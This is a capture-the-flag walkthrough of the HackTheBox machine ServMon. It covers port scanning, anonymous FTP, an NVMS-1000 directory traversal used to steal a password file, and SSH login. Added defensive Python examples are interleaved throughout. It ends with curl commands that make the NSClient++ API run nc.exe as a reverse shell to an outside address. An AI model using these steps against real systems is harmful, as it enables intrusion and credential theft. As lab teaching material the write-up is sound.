ServMon HacktheBox Walkthrough
In this article we are going to solve another boot2root challenge, ServMon from HackTheBox.
walkthrough
IP of the target: 10.10.10.184
We started with nmap to find the open ports and the services running on the system, using the command
nmap -sC -sV -oN nmap.txt 10.10.10.184
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open napster?
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
|_ jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
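A scan like the one above is easiest to act on once it is turned into structured data. The following is an added example (not part of the original walkthrough): a small parser for nmap's normal (-oN) output that collects each port line together with its NSE script output, plus a triage pass that flags the exposures a defender would want to know about first. The sample scan text is constructed from a few lines of the scan above, and the function and rule names are my own.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: a few lines in nmap's normal (-oN) output format,
# modelled on the scan above (not the full scan).
SAMPLE_SCAN = """\
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp   open  http
445/tcp  open  microsoft-ds?
8443/tcp open  ssl/https-alt
| http-title: NSClient++
|_Requested resource was /index.html
"""

# "port/proto  state  service  [version string]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str = ""
    script_output: list = field(default_factory=list)


def parse_nmap_normal(text):
    """Turn nmap -oN text into Service records; script lines attach to the preceding port."""
    services = []
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = Service(int(m.group(1)), m.group(2), m.group(3),
                              m.group(4), (m.group(5) or "").strip())
            services.append(current)
        elif line.startswith("|") and current is not None:
            # Strip the "| " / "|_" script-output prefix and keep the text.
            current.script_output.append(line.lstrip("|_ ").strip())
    return services


def triage(services):
    """Return (port, reason) pairs for exposures worth a defender's attention."""
    findings = []
    for s in services:
        blob = " ".join(s.script_output)
        if s.name == "ftp" and "Anonymous FTP login allowed" in blob:
            findings.append((s.port, "anonymous FTP login allowed"))
        if s.port == 445:
            findings.append((s.port, "SMB exposed to the scanning host"))
        if "NSClient++" in blob:
            findings.append((s.port, "NSClient++ web interface reachable"))
    return findings


if __name__ == "__main__":
    for port, reason in triage(parse_nmap_normal(SAMPLE_SCAN)):
        print(f"{port}: {reason}")
```

The rules are deliberately simple string checks; in practice they would be driven by an allow-list of services expected on the host, so that anything else on the scan stands out.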
As we can see, many ports are open, so first of all we decided to log in anonymously to FTP using the credentials anonymous / anonymous.

Here we found two users, "Nadine" and "Nathan", and after enumerating further we found two important text files. We downloaded them to our local system; now let's try to read them.

Information extracted:
[+] User names: Nathan and Nadine
[+] A passwords.txt file is stored in a Desktop directory
[+] An NVMS web application is present
Now our next step is to enumerate port 80.

We have an NVMS-1000 login panel, and some common usernames and passwords didn't work, so we searched for an NVMS-1000 exploit and found one using the command
search nvms

With the description "Directory Traversal", one thing became clear: we know about passwords.txt, the user names and a Desktop directory, so there is a good chance we can extract the passwords.txt file using this exploit. Okay, let's try.
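The bug class being used here is worth seeing from the application side. The following is an added example, not code from the walkthrough or from NVMS-1000: a file-serving routine that joins the client-supplied path straight onto the web root (the pattern behind directory traversal), next to a hardened version that resolves the path and refuses anything that ends up outside the root. The demo builds a throwaway web root with a constructed stand-in for an out-of-root file; the function names are my own.

```python
import tempfile
from pathlib import Path


def vulnerable_read(webroot, requested):
    """Vulnerable: the client path is joined as-is, so '..' segments leave the web root."""
    return Path(webroot, requested.lstrip("/\\")).read_bytes()


def safe_resolve(webroot, requested):
    """Resolve the requested path and require it to stay inside the web root.

    Expects an already URL-decoded path: decode once before calling, so that
    encoded separators cannot slip past the check.
    """
    root = Path(webroot).resolve()
    candidate = (root / requested.lstrip("/\\")).resolve()
    if candidate != root and root not in candidate.parents:
        raise PermissionError(f"path escapes web root: {requested!r}")
    return candidate


def hardened_read(webroot, requested):
    """Hardened: serve only files whose resolved path lies under the web root."""
    return safe_resolve(webroot, requested).read_bytes()


def demo():
    """Return (vulnerable_leaked, hardened_blocked, hardened_serves_normal_file)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp, "webroot")
        root.mkdir()
        (root / "index.html").write_text("<html>login</html>")
        # Constructed stand-in for a file that lives outside the web root.
        Path(tmp, "passwords.txt").write_text("not-a-real-secret")

        traversal = "../passwords.txt"
        leaked = vulnerable_read(root, traversal) == b"not-a-real-secret"
        try:
            hardened_read(root, traversal)
            blocked = False
        except PermissionError:
            blocked = True
        ok = hardened_read(root, "index.html") == b"<html>login</html>"
        return leaked, blocked, ok


if __name__ == "__main__":
    print(demo())
```

The check compares resolved paths rather than searching the string for "..", which also covers symlinks and mixed separators; on the detection side, requests whose path contains parent-directory segments are a cheap log signature for this class of probe.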

Okay, we have got something; let's try to read the file using the cat command.

Umm, looks interesting: we have got a list of passwords, we also have two users, "Nadine" and "Nathan", and the SSH port is open, so we can try these passwords against the two users to check whether we are on the right path.

Okay, we have found the password for user nadine as "********". Now I tried this password to connect to the system as user nadine using ssh
ssh nadine@10.10.10.184

We are in now as user nadine and can read the user flag, and it's time for privilege escalation :)
We started searching in different directories and found something useful.

Let's try to read the file using the type command ;)

It means only 127.0.0.1 is allowed to use NSClient++ and no other IP. After this we have two methods to get admin access: one is port forwarding and then following the NSClient++ exploit, and the other is to use the NSClient++ API (the easy way), and of course we preferred the easy way :)
First of all we will transfer nc.exe to the /tmp directory.
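The lesson for whoever runs NSClient++ is that restricting allowed hosts to loopback is not enough when a local user can read the configuration and reach the API on 127.0.0.1. The following is an added example, not from the walkthrough or from the NSClient++ project: a small audit of an nsclient.ini that flags the combination of settings that makes the service a privilege-escalation path. The sample ini is constructed, following the section and key names of NSClient++'s documented layout; the audit function and its rule wording are my own.

```python
import configparser
import ipaddress

# Constructed sample nsclient.ini (not the box's actual file). Section and key
# names follow the documented NSClient++ layout; the values are made up.
SAMPLE_INI = """\
[/modules]
WEBServer = enabled
CheckExternalScripts = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = ChangeMe

[/settings/external scripts]
allow arguments = true
allow nasty characters = true

[/settings/WEB/server]
port = 8443s
"""


def _is_loopback(entry):
    """True only for addresses or networks inside 127.0.0.0/8 or ::1."""
    try:
        net = ipaddress.ip_network(entry, strict=False)
    except ValueError:
        return False  # hostnames and wildcards are treated as non-loopback
    loop = ipaddress.ip_network("127.0.0.0/8") if net.version == 4 \
        else ipaddress.ip_network("::1/128")
    return net.subnet_of(loop)


def audit_nsclient(ini_text):
    """Return a list of human-readable findings for risky NSClient++ settings."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(ini_text)

    def get(section, key, default=""):
        return cfg.get(section, key, fallback=default).strip()

    findings = []

    hosts = [h.strip() for h in get("/settings/default", "allowed hosts").split(",") if h.strip()]
    if not hosts or any(not _is_loopback(h) for h in hosts):
        findings.append("allowed hosts is broader than loopback")

    pw = get("/settings/default", "password")
    if pw == "" or pw.lower() in {"changeme", "password", "admin"}:
        findings.append("API password is empty or a default")

    web = get("/modules", "WEBServer").lower() == "enabled"
    ext = get("/modules", "CheckExternalScripts").lower() == "enabled"
    if web and ext:
        # This pairing is what turns API access into command execution as the
        # service account: the web API can add and run external scripts.
        findings.append("web API and external scripts both enabled: any caller with the password can add and run scripts")

    if get("/settings/external scripts", "allow arguments").lower() == "true":
        findings.append("external scripts accept caller-supplied arguments")
    if get("/settings/external scripts", "allow nasty characters").lower() == "true":
        findings.append("external scripts allow shell metacharacters in arguments")

    return findings


if __name__ == "__main__":
    for finding in audit_nsclient(SAMPLE_INI):
        print("[!]", finding)
```

Two things the audit cannot see from the file contents alone, and which matter just as much here: the NTFS ACL on nsclient.ini (a non-admin user should not be able to read the password at all) and whether the service runs as SYSTEM, which is what makes script execution through the API a full compromise rather than a nuisance.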

curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/new.bat --data-binary "c:\temp\nc.exe 10.10.14.22 1234 -e cmd.exe"
curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/new/commands/execute?time=1m
After executing these commands we get a reverse shell as admin.

We can read the final flag now, and this completes our challenge. Hope you like the walkthrough :)